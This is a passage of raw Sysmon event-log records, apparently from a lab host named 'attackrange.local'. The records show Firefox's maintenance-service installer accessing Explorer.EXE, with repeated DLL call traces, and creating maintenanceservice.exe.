Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3 10341000x800000000000000016259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000016246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeC:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe2021-01-18 13:59:53.177 10341000x800000000000000016245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 